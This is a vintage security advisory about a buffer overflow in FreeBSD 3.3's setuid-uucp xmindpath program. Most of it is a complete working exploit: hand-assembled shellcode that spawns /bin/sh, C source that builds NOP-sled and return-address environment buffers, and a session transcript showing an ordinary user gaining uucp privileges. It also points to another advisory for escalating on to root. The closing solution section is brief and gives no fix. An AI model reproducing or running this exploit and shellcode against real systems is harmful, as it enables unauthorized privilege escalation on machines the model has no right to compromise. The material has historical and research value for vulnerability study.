COMMAND

    /usr/X11R6/bin/xmindpath

SYSTEMS AFFECTED

    FreeBSD 3.3

PROBLEM

    Brock Tellier found the following.  It was tested on FreeBSD
    3.3-RELEASE.  The program was installed with the default permissions
    given when unpacked with sysinstall:

        -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath

    /usr/X11R6/bin/xmindpath (suid uucp by default), contains a buffer
    overflow which  will allow  any user  to gain  uucp privs.  Simply
    enough:

        xmindpath -f $BUF

    See my "faxalter"  advisory for more  info on gaining  root w/euid
    uucp.  Exploit:

        bash-2.03$ ls -la `which xmindpath`; id
        -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
        uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
        bash-2.03$ ./xmindx
        FreeBSD xmindpath exploit /path/to/xmindpath -f $RET
        Brock Tellier btellier@usa.net
        Using addr: 0xbfbfcfa8
        bash-2.03$ xmindpath -f $RET
        lock open: File name too long
        $ id
        uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec)
        $

    The code itself:

    /*
     *
     * FreeBSD 3.3 xmindpath exploit gives euid uucp
     * Compile: gcc -o xmindx xmindx.c
     * Usage: ./xmindx <offset>  /path/to/xmindpath -f $RET
     * Brock Tellier <btellier@usa.net>
     *
     */


    #include <stdlib.h>
    #include <stdio.h>

    /*
     * Payload: hand-assembled i386 machine code ending in the string
     * "/bin/sh", credited to mudge@l0pht.com.  The bytes are reproduced
     * exactly as published; the program copies them to the end of the
     * EGG buffer below and never interprets them itself.
     */
    char shell[]= /* mudge@l0pht.com */
    "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
    "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

    #define EGGLEN 2048   /* size of the EGG buffer: NOP bytes followed by the payload */
    #define RETLEN 279    /* size of the RET buffer: the chosen address repeated */
    #define ALIGN 3       /* byte offset in ret[] at which the first 4-byte address is stored */
    #define NOP 0x90      /* single-byte i386 NOP opcode used to fill the sled */

    /*
     * Prepares the two environment variables the advisory's instructions
     * rely on and then drops the user into a shell that inherits them:
     *   EGG - a buffer of NOP bytes with the payload placed at its end
     *   RET - the same 4-byte address repeated across the buffer
     * The user then runs the vulnerable binary by hand as
     * "xmindpath -f $RET" (see the transcript above).  argv[1], when
     * present, is an integer offset added to the built-in base address.
     * There is no return statement, so the process exit status is
     * whatever falling off the end of main() yields on this compiler.
     * memset/memcpy/strlen are declared in <string.h>, which is not
     * included here; the compiler of the day accepted implicit declarations.
     */
    int main(int argc, char *argv[]) {

    long int offset=0;              /* optional adjustment taken from argv[1] */
    int i;
    int egglen = EGGLEN;
    int retlen = RETLEN;
    long int addr = 0xbfbfcfa8;     /* base address; presumably picked for the author's
                                       FreeBSD 3.3-RELEASE i386 box, not portable */
    char egg[EGGLEN];               /* becomes the EGG variable */
    char ret[RETLEN];               /* becomes the RET variable */

    if (argc == 2) offset = atoi(argv[1]);   /* atoi: malformed input silently yields 0 */

    addr=addr + offset;

    fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RET\n");
    fprintf(stderr, "Brock Tellier btellier@usa.net\n");
    fprintf(stderr, "Using addr: 0x%x\n", addr);   /* long passed to %x: fine on the 32-bit target only */

    /* fill egg with NOP bytes, then copy the payload so that it ends one
       byte before the end of the buffer */
    memset(egg,NOP,egglen);
    memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell));

    /* store addr as a 4-byte int at every fourth offset starting at ALIGN;
       the "RET=" prefix copied below overwrites bytes 0..3 afterwards */
    for(i=ALIGN;i< retlen;i+=4)
    *(int *)&ret[i]=addr;

    /* turn the raw buffers into "NAME=value" strings and export them.
       putenv() keeps pointers to these stack arrays, which holds up here
       only because system() runs before main() returns */
    memcpy(egg, "EGG=", 4);
    putenv(egg);
    memcpy(ret,"RET=",4);
    putenv(ret);

    system("/usr/local/bin/bash");   /* interactive shell inheriting EGG and RET */

    }

SOLUTION

    This one is a hole in the vendor-provided software, which wants to
    install it setuid  uucp by default.   With ~2800 third-party  apps
    shipped with FreeBSD, you may expect this to happen.